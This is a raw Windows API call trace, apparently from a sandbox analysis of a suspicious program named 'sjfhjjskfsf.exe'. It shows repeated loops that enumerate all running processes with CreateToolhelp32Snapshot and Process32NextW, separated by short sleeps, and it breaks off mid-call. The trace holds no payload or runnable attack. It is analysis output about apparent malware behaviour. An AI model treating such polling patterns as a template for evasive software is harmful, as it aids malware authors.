Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.799] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.800] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.800] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.800] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.801] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.801] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.801] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.801] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.802] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.802] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.802] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.802] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.803] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.803] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.804] Process32NextW (in: hSnapshot=0x10c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.804] Sleep (dwMilliseconds=0x64) [0209.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x110 [0209.976] Process32FirstW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.976] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.977] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.977] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.977] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.978] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.978] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.978] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.978] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.979] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.979] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.979] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.980] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.980] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.980] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.980] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.981] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.981] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.981] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0209.982] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.982] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.982] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.982] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.983] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.983] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0209.983] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0209.984] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0209.984] Process32NextW (in: hSnapshot=0x110, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0209.984] Sleep (dwMilliseconds=0x64) [0210.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x114 [0210.251] Process32FirstW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.251] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.252] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.252] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.252] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.252] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.253] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.253] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.253] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.253] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0210.254] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.254] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.254] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.255] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.255] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.255] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.256] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.256] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.256] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0210.257] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.257] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.257] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.258] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.258] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.258] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0210.258] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0210.259] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0210.259] Process32NextW (in: hSnapshot=0x114, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0210.259] Sleep (dwMilliseconds=0x64) [0210.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0210.936] Process32FirstW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.937] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.937] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.937] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.938] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.938] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.938] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.939] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.939] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.939] Process32NextW (in: hSnapshot=0x118, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0210.940] Process32NextW (in: hSnapshot=0x118, 